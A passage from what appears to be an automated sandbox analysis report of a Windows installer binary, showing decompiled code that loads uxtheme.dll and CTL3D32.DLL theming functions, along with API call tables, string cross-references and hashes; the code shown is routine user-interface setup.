					_t3 = E0044B3FC();
					if(_t3 != 0) {
						_t3 = LoadLibraryA("uxtheme.dll");
						 *0x48d73c = _t3;
						if( *0x48d73c != 0) {
							_push("OpenThemeData");
							_t5 =  *0x48d73c;
							_push(_t5);
							L00405AA4();
							 *0x48d680 = _t5;
							_push("CloseThemeData");
							_t6 =  *0x48d73c;
							_push(_t6);
							L00405AA4();
							 *0x48d684 = _t6;
							_push("DrawThemeBackground");
							_t7 =  *0x48d73c;
							_push(_t7);
							L00405AA4();
							 *0x48d688 = _t7;
							_push("DrawThemeText");
							_t8 =  *0x48d73c;
							_push(_t8);
							L00405AA4();
							 *0x48d68c = _t8;
							_push("GetThemeBackgroundContentRect");
							_t9 =  *0x48d73c;
							_push(_t9);
							L00405AA4();
							 *0x48d690 = _t9;
							_push("GetThemeBackgroundContentRect");
							_t10 =  *0x48d73c;
							_push(_t10);
							L00405AA4();
							 *0x48d694 = _t10;
							_push("GetThemePartSize");
							_t11 =  *0x48d73c;
							_push(_t11);
							L00405AA4();
							 *0x48d698 = _t11;
							_push("GetThemeTextExtent");
							_t12 =  *0x48d73c;
							_push(_t12);
							L00405AA4();
							 *0x48d69c = _t12;
							_push("GetThemeTextMetrics");
							_t13 =  *0x48d73c;
							_push(_t13);
							L00405AA4();
							 *0x48d6a0 = _t13;
							_push("GetThemeBackgroundRegion");
							_t14 =  *0x48d73c;
							_push(_t14);
							L00405AA4();
							 *0x48d6a4 = _t14;
							_push("HitTestThemeBackground");
							_t15 =  *0x48d73c;
							_push(_t15);
							L00405AA4();
							 *0x48d6a8 = _t15;
							_push("DrawThemeEdge");
							_t16 =  *0x48d73c;
							_push(_t16);
							L00405AA4();
							 *0x48d6ac = _t16;
							_push("DrawThemeIcon");
							_t17 =  *0x48d73c;
							_push(_t17);
							L00405AA4();
							 *0x48d6b0 = _t17;
							_push("IsThemePartDefined");
							_t18 =  *0x48d73c;
							_push(_t18);
							L00405AA4();
							 *0x48d6b4 = _t18;
							_push("IsThemeBackgroundPartiallyTransparent");
							_t19 =  *0x48d73c;
							_push(_t19);
							L00405AA4();
							 *0x48d6b8 = _t19;
							_push("GetThemeColor");
							_t20 =  *0x48d73c;
							_push(_t20);
							L00405AA4();
							 *0x48d6bc = _t20;
							_push("GetThemeMetric");
							_t21 =  *0x48d73c;
							_push(_t21);
							L00405AA4();
							 *0x48d6c0 = _t21;
							_push("GetThemeString");
							_t22 =  *0x48d73c;
							_push(_t22);
							L00405AA4();
							 *0x48d6c4 = _t22;
							_push("GetThemeBool");
							_t23 =  *0x48d73c;
							_push(_t23);
							L00405AA4();
							 *0x48d6c8 = _t23;
							_push("GetThemeInt");
							_t24 =  *0x48d73c;
							_push(_t24);
							L00405AA4();
							 *0x48d6cc = _t24;
							_push("GetThemeEnumValue");
							_t25 =  *0x48d73c;
							_push(_t25);
							L00405AA4();
							 *0x48d6d0 = _t25;
							_push("GetThemePosition");
							_t26 =  *0x48d73c;
							_push(_t26);
							L00405AA4();
							 *0x48d6d4 = _t26;
							_push("GetThemeFont");
							_t27 =  *0x48d73c;
							_push(_t27);
							L00405AA4();
							 *0x48d6d8 = _t27;
							_push("GetThemeRect");
							_t28 =  *0x48d73c;
							_push(_t28);
							L00405AA4();
							 *0x48d6dc = _t28;
							_push("GetThemeMargins");
							_t29 =  *0x48d73c;
							_push(_t29);
							L00405AA4();
							 *0x48d6e0 = _t29;
							_push("GetThemeIntList");
							_t30 =  *0x48d73c;
							_push(_t30);
							L00405AA4();
							 *0x48d6e4 = _t30;
							_push("GetThemePropertyOrigin");
							_t31 =  *0x48d73c;
							_push(_t31);
							L00405AA4();
							 *0x48d6e8 = _t31;
							_push("SetWindowTheme");
							_t32 =  *0x48d73c;
							_push(_t32);
							L00405AA4();
							 *0x48d6ec = _t32;
							_push("GetThemeFilename");
							_t33 =  *0x48d73c;
							_push(_t33);
							L00405AA4();
							 *0x48d6f0 = _t33;
							_push("GetThemeSysColor");
							_t34 =  *0x48d73c;
							_push(_t34);
							L00405AA4();
							 *0x48d6f4 = _t34;
							_push("GetThemeSysColorBrush");
							_t35 =  *0x48d73c;
							_push(_t35);
							L00405AA4();
							 *0x48d6f8 = _t35;
							_push("GetThemeSysBool");
							_t36 =  *0x48d73c;
							_push(_t36);
							L00405AA4();
							 *0x48d6fc = _t36;
							_push("GetThemeSysSize");
							_t37 =  *0x48d73c;
							_push(_t37);
							L00405AA4();
							 *0x48d700 = _t37;
							_push("GetThemeSysFont");
							_t38 =  *0x48d73c;
							_push(_t38);
							L00405AA4();
							 *0x48d704 = _t38;
							_push("GetThemeSysString");
							_t39 =  *0x48d73c;
							_push(_t39);
							L00405AA4();
							 *0x48d708 = _t39;
							_push("GetThemeSysInt");
							_t40 =  *0x48d73c;
							_push(_t40);
							L00405AA4();
							 *0x48d70c = _t40;
							_push("IsThemeActive");
							_t41 =  *0x48d73c;
							_push(_t41);
							L00405AA4();
							 *0x48d710 = _t41;
							_push("IsAppThemed");
							_t42 =  *0x48d73c;
							_push(_t42);
							L00405AA4();
							 *0x48d714 = _t42;
							_push("GetWindowTheme");
							_t43 =  *0x48d73c;
							_push(_t43);
							L00405AA4();
							 *0x48d718 = _t43;
							_push("EnableThemeDialogTexture");
							_t44 =  *0x48d73c;
							_push(_t44);
							L00405AA4();
							 *0x48d71c = _t44;
							_push("IsThemeDialogTextureEnabled");
							_t45 =  *0x48d73c;
							_push(_t45);
							L00405AA4();
							 *0x48d720 = _t45;
							_push("GetThemeAppProperties");
							_t46 =  *0x48d73c;
							_push(_t46);
							L00405AA4();
							 *0x48d724 = _t46;
							_push("SetThemeAppProperties");
							_t47 =  *0x48d73c;
							_push(_t47);
							L00405AA4();
							 *0x48d728 = _t47;
							_push("GetCurrentThemeName");
							_t48 =  *0x48d73c;
							_push(_t48);
							L00405AA4();
							 *0x48d72c = _t48;
							_push("GetThemeDocumentationProperty");
							_t49 =  *0x48d73c;
							_push(_t49);
							L00405AA4();
							 *0x48d730 = _t49;
							_push("DrawThemeParentBackground");
							_t50 =  *0x48d73c;
							_push(_t50);
							L00405AA4();
							 *0x48d734 = _t50;
							_push("EnableTheming");
							_t3 =  *0x48d73c;
							_push(_t3);
							L00405AA4();
							 *0x48d738 = _t3;
						}
					}
				}
				return _t3 & 0xffffff00 |  *0x48d73c != 0x00000000;
			}

0x0044b456
0x0044b45f
0x0044b465
0x0044b46c
0x0044b477
0x0044b47c
0x0044b481
0x0044b487
0x0044b48c
0x0044b48e
0x0044b48f
0x0044b494
0x0044b499
0x0044b49e
0x0044b4a0
0x0044b4a1
0x0044b4a6
0x0044b4ab
0x0044b4b0
0x0044b4b2
0x0044b4b3
0x0044b4b8
0x0044b4bd
0x0044b4c2
0x0044b4c4
0x0044b4c5
0x0044b4ca
0x0044b4cf
0x0044b4d4
0x0044b4d6
0x0044b4d7
0x0044b4dc
0x0044b4e1
0x0044b4e6
0x0044b4e8
0x0044b4e9
0x0044b4ee
0x0044b4f3
0x0044b4f8
0x0044b4fa
0x0044b4fb
0x0044b500
0x0044b505
0x0044b50a
0x0044b50c
0x0044b50d
0x0044b512
0x0044b517
0x0044b51c
0x0044b51e
0x0044b51f
0x0044b524
0x0044b529
0x0044b52e
0x0044b530
0x0044b531
0x0044b536
0x0044b53b
0x0044b540
0x0044b542
0x0044b543
0x0044b548
0x0044b54d
0x0044b552
0x0044b554
0x0044b555
0x0044b55a
0x0044b55f
0x0044b564
0x0044b566
0x0044b567
0x0044b56c
0x0044b571
0x0044b576
0x0044b578
0x0044b579
0x0044b57e
0x0044b583
0x0044b588
0x0044b58a
0x0044b58b
0x0044b590
0x0044b595
0x0044b59a
0x0044b59c
0x0044b59d
0x0044b5a2
0x0044b5a7
0x0044b5ac
0x0044b5ae
0x0044b5af
0x0044b5b4
0x0044b5b9
0x0044b5be
0x0044b5c0
0x0044b5c1
0x0044b5c6
0x0044b5cb
0x0044b5d0
0x0044b5d2
0x0044b5d3
0x0044b5d8
0x0044b5dd
0x0044b5e2
0x0044b5e4
0x0044b5e5
0x0044b5ea
0x0044b5ef
0x0044b5f4
0x0044b5f6
0x0044b5f7
0x0044b5fc
0x0044b601
0x0044b606
0x0044b608
0x0044b609
0x0044b60e
0x0044b613
0x0044b618
0x0044b61a
0x0044b61b
0x0044b620
0x0044b625
0x0044b62a
0x0044b62c
0x0044b62d
0x0044b632
0x0044b637
0x0044b63c
0x0044b63e
0x0044b63f
0x0044b644
0x0044b649
0x0044b64e
0x0044b650
0x0044b651
0x0044b656
0x0044b65b
0x0044b660
0x0044b662
0x0044b663
0x0044b668
0x0044b66d
0x0044b672
0x0044b674
0x0044b675
0x0044b67a
0x0044b67f
0x0044b684
0x0044b686
0x0044b687
0x0044b68c
0x0044b691
0x0044b696
0x0044b698
0x0044b699
0x0044b69e
0x0044b6a3
0x0044b6a8
0x0044b6aa
0x0044b6ab
0x0044b6b0
0x0044b6b5
0x0044b6ba
0x0044b6bc
0x0044b6bd
0x0044b6c2
0x0044b6c7
0x0044b6cc
0x0044b6ce
0x0044b6cf
0x0044b6d4
0x0044b6d9
0x0044b6de
0x0044b6e0
0x0044b6e1
0x0044b6e6
0x0044b6eb
0x0044b6f0
0x0044b6f2
0x0044b6f3
0x0044b6f8
0x0044b6fd
0x0044b702
0x0044b704
0x0044b705
0x0044b70a
0x0044b70f
0x0044b714
0x0044b716
0x0044b717
0x0044b71c
0x0044b721
0x0044b726
0x0044b728
0x0044b729
0x0044b72e
0x0044b733
0x0044b738
0x0044b73a
0x0044b73b
0x0044b740
0x0044b745
0x0044b74a
0x0044b74c
0x0044b74d
0x0044b752
0x0044b757
0x0044b75c
0x0044b75e
0x0044b75f
0x0044b764
0x0044b769
0x0044b76e
0x0044b770
0x0044b771
0x0044b776
0x0044b77b
0x0044b780
0x0044b782
0x0044b783
0x0044b788
0x0044b78d
0x0044b792
0x0044b794
0x0044b795
0x0044b79a
0x0044b79f
0x0044b7a4
0x0044b7a6
0x0044b7a7
0x0044b7ac
0x0044b7b1
0x0044b7b6
0x0044b7b8
0x0044b7b9
0x0044b7be
0x0044b7c3
0x0044b7c8
0x0044b7ca
0x0044b7cb
0x0044b7d0
0x0044b7d0
0x0044b481
0x0044b46c
0x0044b7dc

APIs

Part of subcall function 0044B3FC: GetVersionExA.KERNEL32(00000094), ref: 0044B419

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B477
6D2B5550.KERNEL32(00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B48F
6D2B5550.KERNEL32(00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B4A1
6D2B5550.KERNEL32(00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B4B3
6D2B5550.KERNEL32(00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B4C5
6D2B5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B4D7
6D2B5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F559,0048B2C3), ref: 0044B4E9
6D2B5550.KERNEL32(00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll), ref: 0044B4FB
6D2B5550.KERNEL32(00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData), ref: 0044B50D
6D2B5550.KERNEL32(00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData), ref: 0044B51F
6D2B5550.KERNEL32(00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground), ref: 0044B531
6D2B5550.KERNEL32(00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText), ref: 0044B543
6D2B5550.KERNEL32(00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect), ref: 0044B555
6D2B5550.KERNEL32(00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect), ref: 0044B567
6D2B5550.KERNEL32(00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize), ref: 0044B579
6D2B5550.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent), ref: 0044B58B
6D2B5550.KERNEL32(00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics), ref: 0044B59D
6D2B5550.KERNEL32(00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion), ref: 0044B5AF
6D2B5550.KERNEL32(00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground), ref: 0044B5C1
6D2B5550.KERNEL32(00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge), ref: 0044B5D3
6D2B5550.KERNEL32(00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon), ref: 0044B5E5
6D2B5550.KERNEL32(00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined), ref: 0044B5F7
6D2B5550.KERNEL32(00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B609
6D2B5550.KERNEL32(00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor), ref: 0044B61B
6D2B5550.KERNEL32(00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric), ref: 0044B62D
6D2B5550.KERNEL32(00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString), ref: 0044B63F
6D2B5550.KERNEL32(00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool), ref: 0044B651
6D2B5550.KERNEL32(00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt), ref: 0044B663
6D2B5550.KERNEL32(00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue), ref: 0044B675
6D2B5550.KERNEL32(00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition), ref: 0044B687
6D2B5550.KERNEL32(00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont), ref: 0044B699
6D2B5550.KERNEL32(00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect), ref: 0044B6AB
6D2B5550.KERNEL32(00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins), ref: 0044B6BD
6D2B5550.KERNEL32(00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList), ref: 0044B6CF
6D2B5550.KERNEL32(00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin), ref: 0044B6E1
6D2B5550.KERNEL32(00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme), ref: 0044B6F3
6D2B5550.KERNEL32(00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename), ref: 0044B705
6D2B5550.KERNEL32(00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor), ref: 0044B717
6D2B5550.KERNEL32(00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush), ref: 0044B729
6D2B5550.KERNEL32(00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool), ref: 0044B73B
6D2B5550.KERNEL32(00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize), ref: 0044B74D
6D2B5550.KERNEL32(00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont), ref: 0044B75F
6D2B5550.KERNEL32(00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString), ref: 0044B771
6D2B5550.KERNEL32(00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt), ref: 0044B783
6D2B5550.KERNEL32(00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive), ref: 0044B795
6D2B5550.KERNEL32(00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed), ref: 0044B7A7
6D2B5550.KERNEL32(00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme), ref: 0044B7B9
6D2B5550.KERNEL32(00000000,EnableTheming,00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture), ref: 0044B7CB

Strings

GetWindowTheme, xrefs: 0044B733
GetThemeTextMetrics, xrefs: 0044B517
IsThemeDialogTextureEnabled, xrefs: 0044B757
EnableThemeDialogTexture, xrefs: 0044B745
DrawThemeEdge, xrefs: 0044B54D
CloseThemeData, xrefs: 0044B499
DrawThemeText, xrefs: 0044B4BD
GetThemeInt, xrefs: 0044B5DD
IsThemeBackgroundPartiallyTransparent, xrefs: 0044B583
EnableTheming, xrefs: 0044B7C3
GetThemeAppProperties, xrefs: 0044B769
GetThemeColor, xrefs: 0044B595
GetThemeMetric, xrefs: 0044B5A7
GetThemeBool, xrefs: 0044B5CB
SetThemeAppProperties, xrefs: 0044B77B
OpenThemeData, xrefs: 0044B487
GetThemeSysColorBrush, xrefs: 0044B6A3
GetThemeFont, xrefs: 0044B613
GetThemeFilename, xrefs: 0044B67F
DrawThemeIcon, xrefs: 0044B55F
HitTestThemeBackground, xrefs: 0044B53B
GetThemePartSize, xrefs: 0044B4F3
GetThemeSysSize, xrefs: 0044B6C7
GetThemeEnumValue, xrefs: 0044B5EF
GetThemePosition, xrefs: 0044B601
SetWindowTheme, xrefs: 0044B66D
GetThemeRect, xrefs: 0044B625
GetThemeTextExtent, xrefs: 0044B505
GetThemeBackgroundRegion, xrefs: 0044B529
DrawThemeBackground, xrefs: 0044B4AB
DrawThemeParentBackground, xrefs: 0044B7B1
GetThemeIntList, xrefs: 0044B649
GetThemePropertyOrigin, xrefs: 0044B65B
GetThemeBackgroundContentRect, xrefs: 0044B4CF, 0044B4E1
GetThemeString, xrefs: 0044B5B9
GetThemeMargins, xrefs: 0044B637
IsAppThemed, xrefs: 0044B721
IsThemeActive, xrefs: 0044B70F
uxtheme.dll, xrefs: 0044B472
GetThemeSysString, xrefs: 0044B6EB
IsThemePartDefined, xrefs: 0044B571
GetThemeSysInt, xrefs: 0044B6FD
GetThemeSysFont, xrefs: 0044B6D9
GetThemeSysColor, xrefs: 0044B691
GetThemeDocumentationProperty, xrefs: 0044B79F
GetCurrentThemeName, xrefs: 0044B78D
GetThemeSysBool, xrefs: 0044B6B5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 317324613-2910565190
Opcode ID: c2664487c91fa70efc50b583ac569c99406fdc4e9a249c38e895fed5460e2732
Instruction ID: aa04198c7d21d741b3178dfc5912a305b85a8b543d59139dbed20c44a61cc46f
Opcode Fuzzy Hash: c2664487c91fa70efc50b583ac569c99406fdc4e9a249c38e895fed5460e2732
Instruction Fuzzy Hash: FB91FFB0E51A54ABEF00EFB599C6A2A37A8EF497047500A7AB404EF295D77CD800CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F330 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87
libraryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0041F330() {
				int _t1;
				struct HINSTANCE__* _t2;
				intOrPtr _t3;
				struct HINSTANCE__* _t5;
				int _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				signed int _t17;

				if( *0x48c594 != 0) {
					L10:
					return _t1;
				}
				_t1 = GetVersion();
				_t20 = _t1;
				if(_t1 < 4) {
					_t1 = E00406370(_t20);
					if(_t1 < 0x59) {
						_t17 = SetErrorMode(0x8000);
						 *0x48c594 = LoadLibraryA("CTL3D32.DLL");
						_t1 = SetErrorMode(_t17 & 0x0000ffff);
					}
				}
				if( *0x48c594 < 0x20) {
					 *0x48c594 = 1;
				}
				if( *0x48c594 < 0x20) {
					goto L10;
				} else {
					_push("Ctl3dRegister");
					_t2 =  *0x48c594; // 0x1
					_push(_t2);
					L00405AA4();
					 *0x48d630 = _t2;
					_t3 =  *0x48d014; // 0x400000
					_push(_t3);
					if( *0x48d630() == 0) {
						_t5 =  *0x48c594; // 0x1
						_t6 = FreeLibrary(_t5);
						 *0x48c594 = 1;
						return _t6;
					}
					_push("Ctl3dUnregister");
					_t7 =  *0x48c594; // 0x1
					_push(_t7);
					L00405AA4();
					 *0x48d634 = _t7;
					_push("Ctl3dSubclassCtl");
					_t8 =  *0x48c594; // 0x1
					_push(_t8);
					L00405AA4();
					 *0x48d638 = _t8;
					_push("Ctl3dSubclassDlgEx");
					_t9 =  *0x48c594; // 0x1
					_push(_t9);
					L00405AA4();
					 *0x48d63c = _t9;
					_push("Ctl3dDlgFramePaint");
					_t10 =  *0x48c594; // 0x1
					_push(_t10);
					L00405AA4();
					 *0x48c570 = _t10;
					_push("Ctl3dCtlColorEx");
					_t11 =  *0x48c594; // 0x1
					_push(_t11);
					L00405AA4();
					 *0x48c574 = _t11;
					_push("Ctl3dAutoSubclass");
					_t12 =  *0x48c594; // 0x1
					_push(_t12);
					L00405AA4();
					 *0x48d640 = _t12;
					_push("Ctl3dUnAutoSubclass");
					_t13 =  *0x48c594; // 0x1
					_push(_t13);
					L00405AA4();
					 *0x48d644 = _t13;
					_push("Ctl3DColorChange");
					_t14 =  *0x48c594; // 0x1
					_push(_t14);
					L00405AA4();
					 *0x48d648 = _t14;
					_push("BtnWndProc3d");
					_t15 =  *0x48c594; // 0x1
					_push(_t15);
